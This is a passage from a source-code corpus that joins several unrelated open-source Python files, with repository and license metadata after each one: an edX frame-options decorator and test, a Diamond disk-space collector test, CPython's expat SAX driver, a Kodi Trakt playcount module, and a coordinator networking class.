return self
def build(self):
return self.pizza | mit | 5,899,140,755,982,430,000 | 31.114286 | 110 | 0.650045 | false |
BehavioralInsightsTeam/edx-platform | common/djangoapps/third_party_auth/decorators.py | 14 | 1358 | """
Decorators that can be used to interact with third_party_auth.
"""
from functools import wraps
from django.conf import settings
from django.shortcuts import redirect
from django.utils.decorators import available_attrs
from six.moves.urllib.parse import urlencode, urlparse
from third_party_auth.models import LTIProviderConfig
from third_party_auth.provider import Registry
def xframe_allow_whitelisted(view_func):
"""
Modifies a view function so that its response has the X-Frame-Options HTTP header
set to 'DENY' if the request HTTP referrer is not from a whitelisted hostname.
"""
def wrapped_view(request, *args, **kwargs):
""" Modify the response with the correct X-Frame-Options. """
resp = view_func(request, *args, **kwargs)
x_frame_option = 'DENY'
if settings.FEATURES['ENABLE_THIRD_PARTY_AUTH']:
referer = request.META.get('HTTP_REFERER')
if referer is not None:
parsed_url = urlparse(referer)
hostname = parsed_url.hostname
if LTIProviderConfig.objects.current_set().filter(lti_hostname=hostname, enabled=True).exists():
x_frame_option = 'ALLOW'
resp['X-Frame-Options'] = x_frame_option
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| agpl-3.0 | -6,572,996,483,951,134,000 | 38.941176 | 112 | 0.682622 | false |
ramjothikumar/Diamond | src/collectors/diskspace/test/testdiskspace.py | 18 | 4782 | #!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import run_only
from mock import Mock
from mock import patch
from diamond.collector import Collector
from diskspace import DiskSpaceCollector
##########################################################################
def run_only_if_major_is_available(func):
try:
import os
os.major
major = True
except AttributeError:
major = None
pred = lambda: major is not None
return run_only(func, pred)
class TestDiskSpaceCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('DiskSpaceCollector', {
'interval': 10,
'byte_unit': ['gigabyte'],
'exclude_filters': [
'^/export/home',
'^/tmpfs',
]
})
self.collector = DiskSpaceCollector(config, None)
def test_import(self):
self.assertTrue(DiskSpaceCollector)
@run_only_if_major_is_available
@patch('os.access', Mock(return_value=True))
def test_get_file_systems(self):
result = None
os_stat_mock = patch('os.stat')
os_major_mock = patch('os.major')
os_minor_mock = patch('os.minor')
os_realpath_mock = patch('os.path.realpath')
open_mock = patch('__builtin__.open',
Mock(return_value=self.getFixture('proc_mounts')))
stat_mock = os_stat_mock.start()
stat_mock.return_value.st_dev = 42
major_mock = os_major_mock.start()
major_mock.return_value = 9
minor_mock = os_minor_mock.start()
minor_mock.return_value = 0
realpath_mock = os_realpath_mock.start()
realpath_mock.return_value = '/dev/sda1'
omock = open_mock.start()
result = self.collector.get_file_systems()
os_stat_mock.stop()
os_major_mock.stop()
os_minor_mock.stop()
os_realpath_mock.stop()
open_mock.stop()
stat_mock.assert_called_once_with('/')
major_mock.assert_called_once_with(42)
minor_mock.assert_called_once_with(42)
realpath_mock.assert_called_once_with(
'/dev/disk/by-uuid/81969733-a724-4651-9cf5-64970f86daba')
self.assertEqual(result, {
(9, 0): {
'device':
'/dev/sda1',
'fs_type': 'ext3',
'mount_point': '/'}
})
omock.assert_called_once_with('/proc/mounts')
return result
@run_only_if_major_is_available
@patch('os.access', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
statvfs_mock = Mock()
statvfs_mock.f_bsize = 4096
statvfs_mock.f_frsize = 4096
statvfs_mock.f_blocks = 360540255
statvfs_mock.f_bfree = 285953527
statvfs_mock.f_bavail = 267639130
statvfs_mock.f_files = 91578368
statvfs_mock.f_ffree = 91229495
statvfs_mock.f_favail = 91229495
statvfs_mock.f_flag = 4096
statvfs_mock.f_namemax = 255
os_stat_mock = patch('os.stat')
os_major_mock = patch('os.major', Mock(return_value=9))
os_minor_mock = patch('os.minor', Mock(return_value=0))
os_path_isdir_mock = patch('os.path.isdir', Mock(return_value=False))
open_mock = patch('__builtin__.open',
Mock(return_value=self.getFixture('proc_mounts')))
os_statvfs_mock = patch('os.statvfs', Mock(return_value=statvfs_mock))
os_stat_mock.start()
os_major_mock.start()
os_minor_mock.start()
os_path_isdir_mock.start()
open_mock.start()
os_statvfs_mock.start()
self.collector.collect()
os_stat_mock.stop()
os_major_mock.stop()
os_minor_mock.stop()
os_path_isdir_mock.stop()
open_mock.stop()
os_statvfs_mock.stop()
metrics = {
'root.gigabyte_used': (284.525, 2),
'root.gigabyte_free': (1090.826, 2),
'root.gigabyte_avail': (1020.962, 2),
'root.inodes_used': 348873,
'root.inodes_free': 91229495,
'root.inodes_avail': 91229495
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
##########################################################################
if __name__ == "__main__":
unittest.main()
| mit | 4,512,097,441,752,021,500 | 30.88 | 78 | 0.549561 | false |
Orav/kbengine | kbe/src/lib/python/Lib/xml/sax/expatreader.py | 14 | 15076 | """
SAX driver for the pyexpat C module. This driver works with
pyexpat.__version__ == '2.22'.
"""
version = "0.20"
from xml.sax._exceptions import *
from xml.sax.handler import feature_validation, feature_namespaces
from xml.sax.handler import feature_namespace_prefixes
from xml.sax.handler import feature_external_ges, feature_external_pes
from xml.sax.handler import feature_string_interning
from xml.sax.handler import property_xml_string, property_interning_dict
# xml.parsers.expat does not raise ImportError in Jython
import sys
if sys.platform[:4] == "java":
raise SAXReaderNotAvailable("expat not available in Java", None)
del sys
try:
from xml.parsers import expat
except ImportError:
raise SAXReaderNotAvailable("expat not supported", None)
else:
if not hasattr(expat, "ParserCreate"):
raise SAXReaderNotAvailable("expat not supported", None)
from xml.sax import xmlreader, saxutils, handler
AttributesImpl = xmlreader.AttributesImpl
AttributesNSImpl = xmlreader.AttributesNSImpl
# If we're using a sufficiently recent version of Python, we can use
# weak references to avoid cycles between the parser and content
# handler, otherwise we'll just have to pretend.
try:
import _weakref
except ImportError:
def _mkproxy(o):
return o
else:
import weakref
_mkproxy = weakref.proxy
del weakref, _weakref
# --- ExpatLocator
class ExpatLocator(xmlreader.Locator):
"""Locator for use with the ExpatParser class.
This uses a weak reference to the parser object to avoid creating
a circular reference between the parser and the content handler.
"""
def __init__(self, parser):
self._ref = _mkproxy(parser)
def getColumnNumber(self):
parser = self._ref
if parser._parser is None:
return None
return parser._parser.ErrorColumnNumber
def getLineNumber(self):
parser = self._ref
if parser._parser is None:
return 1
return parser._parser.ErrorLineNumber
def getPublicId(self):
parser = self._ref
if parser is None:
return None
return parser._source.getPublicId()
def getSystemId(self):
parser = self._ref
if parser is None:
return None
return parser._source.getSystemId()
# --- ExpatParser
class ExpatParser(xmlreader.IncrementalParser, xmlreader.Locator):
"""SAX driver for the pyexpat C module."""
def __init__(self, namespaceHandling=0, bufsize=2**16-20):
xmlreader.IncrementalParser.__init__(self, bufsize)
self._source = xmlreader.InputSource()
self._parser = None
self._namespaces = namespaceHandling
self._lex_handler_prop = None
self._parsing = 0
self._entity_stack = []
self._external_ges = 1
self._interning = None
# XMLReader methods
def parse(self, source):
"Parse an XML document from a URL or an InputSource."
source = saxutils.prepare_input_source(source)
self._source = source
self.reset()
self._cont_handler.setDocumentLocator(ExpatLocator(self))
xmlreader.IncrementalParser.parse(self, source)
def prepareParser(self, source):
if source.getSystemId() is not None:
self._parser.SetBase(source.getSystemId())
# Redefined setContentHandler to allow changing handlers during parsing
def setContentHandler(self, handler):
xmlreader.IncrementalParser.setContentHandler(self, handler)
if self._parsing:
self._reset_cont_handler()
def getFeature(self, name):
if name == feature_namespaces:
return self._namespaces
elif name == feature_string_interning:
return self._interning is not None
elif name in (feature_validation, feature_external_pes,
feature_namespace_prefixes):
return 0
elif name == feature_external_ges:
return self._external_ges
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
if self._parsing:
raise SAXNotSupportedException("Cannot set features while parsing")
if name == feature_namespaces:
self._namespaces = state
elif name == feature_external_ges:
self._external_ges = state
elif name == feature_string_interning:
if state:
if self._interning is None:
self._interning = {}
else:
self._interning = None
elif name == feature_validation:
if state:
raise SAXNotSupportedException(
"expat does not support validation")
elif name == feature_external_pes:
if state:
raise SAXNotSupportedException(
"expat does not read external parameter entities")
elif name == feature_namespace_prefixes:
if state:
raise SAXNotSupportedException(
"expat does not report namespace prefixes")
else:
raise SAXNotRecognizedException(
"Feature '%s' not recognized" % name)
def getProperty(self, name):
if name == handler.property_lexical_handler:
return self._lex_handler_prop
elif name == property_interning_dict:
return self._interning
elif name == property_xml_string:
if self._parser:
if hasattr(self._parser, "GetInputContext"):
return self._parser.GetInputContext()
else:
raise SAXNotRecognizedException(
"This version of expat does not support getting"
" the XML string")
else:
raise SAXNotSupportedException(
"XML string cannot be returned when not parsing")
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
if name == handler.property_lexical_handler:
self._lex_handler_prop = value
if self._parsing:
self._reset_lex_handler_prop()
elif name == property_interning_dict:
self._interning = value
elif name == property_xml_string:
raise SAXNotSupportedException("Property '%s' cannot be set" %
name)
else:
raise SAXNotRecognizedException("Property '%s' not recognized" %
name)
# IncrementalParser methods
def feed(self, data, isFinal = 0):
if not self._parsing:
self.reset()
self._parsing = 1
self._cont_handler.startDocument()
try:
# The isFinal parameter is internal to the expat reader.
# If it is set to true, expat will check validity of the entire
# document. When feeding chunks, they are not normally final -
# except when invoked from close.
self._parser.Parse(data, isFinal)
except expat.error as e:
exc = SAXParseException(expat.ErrorString(e.code), e, self)
# FIXME: when to invoke error()?
self._err_handler.fatalError(exc)
def close(self):
if self._entity_stack:
# If we are completing an external entity, do nothing here
return
self.feed("", isFinal = 1)
self._cont_handler.endDocument()
self._parsing = 0
# break cycle created by expat handlers pointing to our methods
self._parser = None
bs = self._source.getByteStream()
if bs is not None:
bs.close()
def _reset_cont_handler(self):
self._parser.ProcessingInstructionHandler = \
self._cont_handler.processingInstruction
self._parser.CharacterDataHandler = self._cont_handler.characters
def _reset_lex_handler_prop(self):
lex = self._lex_handler_prop
parser = self._parser
if lex is None:
parser.CommentHandler = None
parser.StartCdataSectionHandler = None
parser.EndCdataSectionHandler = None
parser.StartDoctypeDeclHandler = None
parser.EndDoctypeDeclHandler = None
else:
parser.CommentHandler = lex.comment
parser.StartCdataSectionHandler = lex.startCDATA
parser.EndCdataSectionHandler = lex.endCDATA
parser.StartDoctypeDeclHandler = self.start_doctype_decl
parser.EndDoctypeDeclHandler = lex.endDTD
def reset(self):
if self._namespaces:
self._parser = expat.ParserCreate(self._source.getEncoding(), " ",
intern=self._interning)
self._parser.namespace_prefixes = 1
self._parser.StartElementHandler = self.start_element_ns
self._parser.EndElementHandler = self.end_element_ns
else:
self._parser = expat.ParserCreate(self._source.getEncoding(),
intern = self._interning)
self._parser.StartElementHandler = self.start_element
self._parser.EndElementHandler = self.end_element
self._reset_cont_handler()
self._parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
self._parser.NotationDeclHandler = self.notation_decl
self._parser.StartNamespaceDeclHandler = self.start_namespace_decl
self._parser.EndNamespaceDeclHandler = self.end_namespace_decl
self._decl_handler_prop = None
if self._lex_handler_prop:
self._reset_lex_handler_prop()
# self._parser.DefaultHandler =
# self._parser.DefaultHandlerExpand =
# self._parser.NotStandaloneHandler =
self._parser.ExternalEntityRefHandler = self.external_entity_ref
try:
self._parser.SkippedEntityHandler = self.skipped_entity_handler
except AttributeError:
# This pyexpat does not support SkippedEntity
pass
self._parser.SetParamEntityParsing(
expat.XML_PARAM_ENTITY_PARSING_UNLESS_STANDALONE)
self._parsing = 0
self._entity_stack = []
# Locator methods
def getColumnNumber(self):
if self._parser is None:
return None
return self._parser.ErrorColumnNumber
def getLineNumber(self):
if self._parser is None:
return 1
return self._parser.ErrorLineNumber
def getPublicId(self):
return self._source.getPublicId()
def getSystemId(self):
return self._source.getSystemId()
# event handlers
def start_element(self, name, attrs):
self._cont_handler.startElement(name, AttributesImpl(attrs))
def end_element(self, name):
self._cont_handler.endElement(name)
def start_element_ns(self, name, attrs):
pair = name.split()
if len(pair) == 1:
# no namespace
pair = (None, name)
elif len(pair) == 3:
pair = pair[0], pair[1]
else:
# default namespace
pair = tuple(pair)
newattrs = {}
qnames = {}
for (aname, value) in attrs.items():
parts = aname.split()
length = len(parts)
if length == 1:
# no namespace
qname = aname
apair = (None, aname)
elif length == 3:
qname = "%s:%s" % (parts[2], parts[1])
apair = parts[0], parts[1]
else:
# default namespace
qname = parts[1]
apair = tuple(parts)
newattrs[apair] = value
qnames[apair] = qname
self._cont_handler.startElementNS(pair, None,
AttributesNSImpl(newattrs, qnames))
def end_element_ns(self, name):
pair = name.split()
if len(pair) == 1:
pair = (None, name)
elif len(pair) == 3:
pair = pair[0], pair[1]
else:
pair = tuple(pair)
self._cont_handler.endElementNS(pair, None)
# this is not used (call directly to ContentHandler)
def processing_instruction(self, target, data):
self._cont_handler.processingInstruction(target, data)
# this is not used (call directly to ContentHandler)
def character_data(self, data):
self._cont_handler.characters(data)
def start_namespace_decl(self, prefix, uri):
self._cont_handler.startPrefixMapping(prefix, uri)
def end_namespace_decl(self, prefix):
self._cont_handler.endPrefixMapping(prefix)
def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
self._lex_handler_prop.startDTD(name, pubid, sysid)
def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
self._dtd_handler.unparsedEntityDecl(name, pubid, sysid, notation_name)
def notation_decl(self, name, base, sysid, pubid):
self._dtd_handler.notationDecl(name, pubid, sysid)
def external_entity_ref(self, context, base, sysid, pubid):
if not self._external_ges:
return 1
source = self._ent_handler.resolveEntity(pubid, sysid)
source = saxutils.prepare_input_source(source,
self._source.getSystemId() or
"")
self._entity_stack.append((self._parser, self._source))
self._parser = self._parser.ExternalEntityParserCreate(context)
self._source = source
try:
xmlreader.IncrementalParser.parse(self, source)
except:
return 0 # FIXME: save error info here?
(self._parser, self._source) = self._entity_stack[-1]
del self._entity_stack[-1]
return 1
def skipped_entity_handler(self, name, is_pe):
if is_pe:
# The SAX spec requires to report skipped PEs with a '%'
name = '%'+name
self._cont_handler.skippedEntity(name)
# ---
def create_parser(*args, **kwargs):
return ExpatParser(*args, **kwargs)
# ---
if __name__ == "__main__":
import xml.sax.saxutils
p = create_parser()
p.setContentHandler(xml.sax.saxutils.XMLGenerator())
p.setErrorHandler(xml.sax.ErrorHandler())
p.parse("http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml")
| lgpl-3.0 | -5,827,036,098,280,784,000 | 34.153477 | 79 | 0.584903 | false |
tvaddonsco/tva-release-repo | leia/plugin.video.premiumizerx/resources/lib/modules/playcount.py | 4 | 14082 | import json
from resources.lib.modules import control
from resources.lib.api import trakt
from resources.lib.modules.metalibrary import playcountMeta
from resources.lib.modules import metalibrary
from resources.lib.modules.log_utils import log
def clearPlaycount():
clear = metalibrary.clearPlaycount()
if clear: control.infoDialog('Database Cleared...')
def traktscrobblePlayback(action, type, imdb = None, tvdb = None, tmdb = None, season = None, episode = None, progress = 0):
try:
if control.setting('trakt.scrobblePlayback') == 'false': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
#print(("TRAKT SCROBBLE PLAYBACK", type, imdb , tvdb, tmdb, season, episode, progress))
result = trakt.scrobblePlayback(action, type, imdb = imdb, tvdb = tvdb, tmdb = tmdb, season = season, episode = episode, progress = progress)
except:
pass
def traktPlayback(type, imdb = None, tvdb = None, tmdb = None, season = None, episode = None):
try:
if control.setting('trakt.scrobblePlayback') == 'false': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
result = trakt.returnPlayback(type, imdb = imdb, tvdb = tvdb, tmdb = tmdb, season = season, episode = episode)
return result
except:
return 0
def getMovieIndicators(refresh=False):
try:
if trakt.getTraktIndicatorsInfo() == True: raise Exception()
indicators = playcountMeta
return indicators
except:
pass
try:
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
print ("TRAKT MOVIES")
if refresh == False: timeout = 720
elif int(trakt.getWatchedActivity()) < int(trakt.timeoutsyncMovies()): timeout = 720
else: timeout = 0
print ("TRAKT TIMEOUT", timeout)
indicators = trakt.cachesyncMovies(timeout=timeout)
return indicators
except:
pass
def getTVShowTraktToLibrary():
try:
indicators = trakt.cachesyncTVShowsToLibrary()
return indicators
except:
pass
def getMovieTraktToLibrary():
try:
indicators = trakt.cachesyncMoviesToLibrary()
return indicators
except:
pass
def getTVShowIndicators(refresh=False):
try:
if trakt.getTraktIndicatorsInfo() == True: raise Exception()
indicators = playcountMeta
return indicators
except:
pass
try:
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if refresh == False: timeout = 720
elif trakt.getWatchedActivity() < trakt.timeoutsyncTVShows(): timeout = 720
else: timeout = 0
indicators = trakt.cachesyncTVShows(timeout=timeout)
return indicators
except:
pass
def getSeasonIndicators(imdb):
try:
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
indicators = trakt.syncSeason(imdb)
return indicators
except:
pass
def getMoviesOverlayLibrary(indicators, imdb):
try:
playcount = [i[2] for i in indicators if i[0] == imdb or i[1] == imdb]
playcount = playcount[0] if len(playcount) > 0 else []
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '0'
def getEpisodeOverlayLibrary(indicators, imdb, season, episode):
try:
playcount = [i[1] for i in indicators if i[0] == imdb]
playcount = playcount[0] if len(playcount) > 0 else []
playcount = [i for i in playcount if int(season) == int(i[0]) and int(episode) == int(i[1])]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '0'
# MAIN MARKINGS
def getMovieOverlay(indicators, imdb=None, tmdb=None, traktOnly=False):
try:
try: # DATABASE
#print ("GETTING MOVIE OVERLAY")
if traktOnly == True: raise Exception()
meta = {'imdb':imdb, 'tmdb': tmdb}
playcount = indicators('movie', meta)
return str(playcount)
except: # TRAKT
if imdb != None and imdb != '0':
playcount = [i for i in indicators if str(i[0]) == str(imdb)]
elif tmdb != None and tmdb != '0':
playcount = [i for i in indicators if str(i[1]) == str(tmdb)]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '6'
def getTVShowOverlay(indicators, tvdb=None, imdb=None, tmdb=None):
try:
try: # DATABASE
meta = {'imdb': imdb, 'tmdb': tmdb}
playcount = indicators('tv', meta)
return str(playcount)
except: # TRAKT
if tvdb != None and tvdb != '0':
playcount = [i for i in indicators if str(i[2]) == str(tvdb) and len(i[4]) >= int(i[3])]
elif imdb != None and imdb != '0':
playcount = [i for i in indicators if str(i[0]) == str(imdb) and len(i[4]) >= int(i[3])]
elif tmdb != None and tmdb != '0':
playcount = [i for i in indicators if str(i[1]) == str(tmdb) and len(i[4]) >= int(i[3])]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '6'
def getEpisodeOverlay(indicators, season, episode, imdb=None, tmdb=None, tvdb=None, traktOnly=False):
try:
try: # DATABASE
if traktOnly == True: raise Exception()
meta = {'imdb':imdb, 'tvdb': tvdb, 'tmdb': tmdb, 'season': season, 'episode':episode}
playcount = indicators('episode', meta)
return str(playcount)
except: # TRAKT
if tvdb != None and tvdb != '0':
playcount = [i[4] for i in indicators if str(i[2]) == str(tvdb)]
elif imdb != None and imdb != '0':
playcount = [i[4] for i in indicators if str(i[0]) == str(imdb)]
elif tmdb != None and tmdb != '0':
playcount = [i[4] for i in indicators if str(i[1]) == str(tmdb)]
#for i in indicators: #print ("INDICATOR", i[0], i[1], i[2], i[3], i[4])
playcount = playcount[0] if len(playcount) > 0 else []
playcount = [i for i in playcount if int(season) == int(i[0]) and int(episode) == int(i[1])]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '6'
# MAIN MARK CALLS
def markMovieDuringPlayback(watched , imdb=None, tmdb=None, refresh=False):
try:
if not control.setting('trakt.scrobbleMovies') == 'true': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7:
# AVOID DUPLICATE WATCHING
indicators = getMovieIndicators(refresh=True)
overlay = int(getMovieOverlay(indicators, imdb=imdb, tmdb=tmdb, traktOnly=True))
if overlay == 7: raise Exception()
trakt.markMovieAsWatched(imdb=imdb, tmdb=tmdb)
else:
trakt.markMovieAsNotWatched(imdb=imdb, tmdb=tmdb)
trakt.cachesyncMovies()
except:
pass
try:
type = 'movie'
action = str(watched)
meta = {'imdb': imdb, 'tmdb': tmdb}
playcountMeta(type, meta, action)
except:
pass
if refresh== True: control.refresh()
def markEpisodeDuringPlayback(season, episode, watched, imdb=None, tmdb=None, tvdb=None, refresh=False):
try:
if not control.setting('trakt.scrobbleTV') == 'true': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7:
# AVOID WATCHING DUPLICATES
indicators = getTVShowIndicators(refresh=True)
overlay = int(getEpisodeOverlay(indicators, season, episode, imdb=imdb, tmdb=tmdb, tvdb=tvdb, traktOnly=True))
if overlay == 7: raise Exception()
trakt.markEpisodeAsWatched(season, episode, imdb=imdb, tmdb=tmdb, tvdb=tvdb)
else: trakt.markEpisodeAsNotWatched(season, episode, imdb=imdb, tmdb=tmdb, tvdb=tvdb)
trakt.cachesyncTVShows()
except:
pass
try:
meta = {'imdb':imdb, 'tvdb':tvdb, 'tmdb': tmdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
except:
pass
if refresh== True: control.refresh()
def movies(watched, imdb=None, tmdb=None):
try:
if not control.setting('trakt.scrobbleMovies') == 'true': raise Exception()
print("trakt indicators")
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7: trakt.markMovieAsWatched(imdb=imdb, tmdb=tmdb)
else: trakt.markMovieAsNotWatched(imdb=imdb, tmdb=tmdb)
trakt.cachesyncMovies()
except:
pass
try:
type = 'movie'
action = str(watched)
meta = {'imdb': imdb, 'tmdb': tmdb}
playcountMeta(type, meta, action)
except:
pass
def episodes(season, episode, watched, imdb=None, tvdb=None, tmdb=None):
try:
if not control.setting('trakt.scrobbleTV') == 'true': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7: trakt.markEpisodeAsWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else: trakt.markEpisodeAsNotWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
trakt.cachesyncTVShows()
except:
pass
try:
meta = {'imdb':imdb, 'tvdb':tvdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
except:
pass
def tvshows(tvshowtitle, season, watched, imdb=None, tvdb=None, tmdb=None):
# #### seasonID 0 is Full Tv Show #####
SeasonID = str(season)
try:
import sys,xbmc
name = control.addonInfo('name')
dialog = control.progressDialogBG
dialog.create(str(name), str(tvshowtitle))
dialog.update(0, str(name), str(tvshowtitle))
from resources.lib.indexers import episodes
year = ''
library = episodes.episodes().getLibrary(tvshowtitle, year, imdb, tvdb, idx=True)
if SeasonID == '0':
metaShow = {'imdb':imdb, 'tvdb':tvdb}
playcountMeta('tv', metaShow, str(watched))
try: items = [i for i in library]
except: pass
items = [{'season': int('%01d' % int(i['season'])), 'episode': int('%01d' % int(i['episode']))} for i in items]
for i in range(len(items)):
if xbmc.abortRequested == True: return sys.exit()
season, episode = items[i]['season'], items[i]['episode']
dialog.update(int((100 / float(len(items))) * i), 'Setting MetaData', 'Season: ' + str(season) + ' Episode: ' + str(episode))
meta = {'imdb':imdb, 'tvdb':tvdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
else:
try: items = [i for i in library if int('%01d' % int(season)) == int('%01d' % int(i['season']))]
except: pass
items = [{'season': int('%01d' % int(i['season'])), 'episode': int('%01d' % int(i['episode']))} for i in items]
for i in range(len(items)):
if xbmc.abortRequested == True: return sys.exit()
season, episode = items[i]['season'], items[i]['episode']
dialog.update(int((100 / float(len(items))) * i), 'Setting MetaData', 'Season: ' + str(season) + ' Episode: ' + str(episode))
meta = {'imdb':imdb, 'tvdb':tvdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
try: dialog.close()
except: pass
except:
try: dialog.close()
except: pass
try:
name = control.addonInfo('name')
dialog = control.progressDialogBG
dialog.create(str(name), str(tvshowtitle))
dialog.update(0, str(name), str(tvshowtitle))
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if not control.setting('trakt.scrobbleTV') == 'true': raise Exception()
if SeasonID == '0':
year = ''
for i in range(len(library)):
season, episode = items[i]['season'], items[i]['episode']
dialog.update(int((100 / float(len(items))) * i), 'TRAKT Watch Status', 'Season: ' + str(season) + ' Episode: ' + str(episode))
if int(watched) == 7: trakt.markEpisodeAsWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else: trakt.markEpisodeAsNotWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else:
year = ''
items = [(int(i['season']), int(i['episode'])) for i in library]
items = [i[1] for i in items if int('%01d' % int(season)) == int('%01d' % i[0])]
for i in items:
dialog.update(int((100 / float(len(items))) * i), 'TRAKT Watch Status', 'Season: ' + str(season) + ' Episode: ' + str(i))
if int(watched) == 7: trakt.markEpisodeAsWatched(season, i, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else: trakt.markEpisodeAsNotWatched(season, i, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
try: dialog.close()
except: pass
trakt.cachesyncTVShows()
except:
pass
# control.refresh()
| gpl-3.0 | 4,708,284,172,765,423,000 | 37.335196 | 149 | 0.56732 | false |
Edraak/edraak-platform | lms/djangoapps/shoppingcart/management/tests/test_retire_order.py | 13 | 2868 | """Tests for the retire_order command"""
from tempfile import NamedTemporaryFile
from django.core.management import call_command
from course_modes.models import CourseMode
from shoppingcart.models import CertificateItem, Order
from student.tests.factories import UserFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
class TestRetireOrder(ModuleStoreTestCase):
"""Test the retire_order command"""
shard = 4
def setUp(self):
super(TestRetireOrder, self).setUp()
course = CourseFactory.create()
self.course_key = course.id
CourseMode.objects.create(
course_id=self.course_key,
mode_slug=CourseMode.HONOR,
mode_display_name=CourseMode.HONOR
)
# set up test carts
self.cart, __ = self._create_cart()
self.paying, __ = self._create_cart()
self.paying.start_purchase()
self.already_defunct_cart, __ = self._create_cart()
self.already_defunct_cart.retire()
self.purchased, self.purchased_item = self._create_cart()
self.purchased.status = "purchased"
self.purchased.save()
self.purchased_item.status = "purchased"
self.purchased.save()
def test_retire_order(self):
"""Test the retire_order command"""
nonexistent_id = max(order.id for order in Order.objects.all()) + 1
order_ids = [
self.cart.id,
self.paying.id,
self.already_defunct_cart.id,
self.purchased.id,
nonexistent_id
]
self._create_tempfile_and_call_command(order_ids)
self.assertEqual(
Order.objects.get(id=self.cart.id).status, "defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.paying.id).status, "defunct-paying"
)
self.assertEqual(
Order.objects.get(id=self.already_defunct_cart.id).status,
"defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.purchased.id).status, "purchased"
)
def _create_tempfile_and_call_command(self, order_ids):
"""
Takes a list of order_ids, writes them to a tempfile, and then runs the
"retire_order" command on the tempfile
"""
with NamedTemporaryFile() as temp:
temp.write("\n".join(str(order_id) for order_id in order_ids))
temp.seek(0)
call_command('retire_order', temp.name)
def _create_cart(self):
"""Creates a cart and adds a CertificateItem to it"""
cart = Order.get_cart_for_user(UserFactory.create())
item = CertificateItem.add_to_order(
cart, self.course_key, 10, 'honor', currency='usd'
)
return cart, item
| agpl-3.0 | -483,587,724,983,874,000 | 31.965517 | 79 | 0.620293 | false |
ganeshgore/myremolab | server/src/voodoo/gen/coordinator/Access.py | 2 | 2950 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <[email protected]>
#
from abc import ABCMeta, abstractmethod
import voodoo.gen.exceptions.coordinator.AccessErrors as AccessErrors
import voodoo.gen.coordinator.Address as Address
class Access(object):
"""A CoordServer will have different "Access"es. For example, a Server can have an Access for
"Direct connections" (with protocol = Direct), and an Access for SOAP, and inside this Access,
it could have different "SOAPNetwork"s. For example, it could have 2 different networks, one
with address '192.168.0.1:8080@Network1' and another with address '130.206.136.137:8080@Network2'. The
Direct or machine access would have one network with a CoordAddress address.
Right now we don't have any MachineNetwork available, since we don't have any IPC protocol available such
as dbus.
"""
def __init__(self, protocol, access_level, networks):
self.protocol = protocol
self.access_level = access_level
self.networks = list(networks)
def possible_connections(self,other):
if other.access_level != self.access_level or other.protocol != self.protocol:
return []
#Now, let's check networks
return_value = []
for i in self.networks:
for j in i.check(other):
return_value.append(j)
return return_value
class Network(object):
__metaclass__ = ABCMeta
def __init__(self, address):
if not isinstance(address,Address.Address):
raise AccessErrors.AccessNotAnAddressError("Not an Address: %s" % address)
self.address = address
@abstractmethod
def check(self,other):
""" check(self,other) -> [Network1,...]
Given this network and an instance of Access called "other",
check will return a list of networks of "other" which are
interoperable with this network
"""
@abstractmethod
def get_protocol(self):
""" get_protocol(self) -> protocol_module
Given this network, it will return the module of the protocol
(SOAP,Direct, and so on).
"""
class IpBasedNetwork(Network):
def __init__(self,address):
""" Address will have this format: 'IP:PORT@NETWORK_NAME' """
if not isinstance(address,Address.IpBasedAddress):
raise AccessErrors.AccessNotAnIpAddressError("Not an IpBasedAddress: %s" % address)
Network.__init__(self,address)
def check(self,other):
return [ i for i in other.networks
if isinstance(i,IpBasedNetwork) and self.address._net_name == i.address._net_name ]
| bsd-2-clause | 581,917,420,640,148,000 | 34.963415 | 109 | 0.67277 | false |
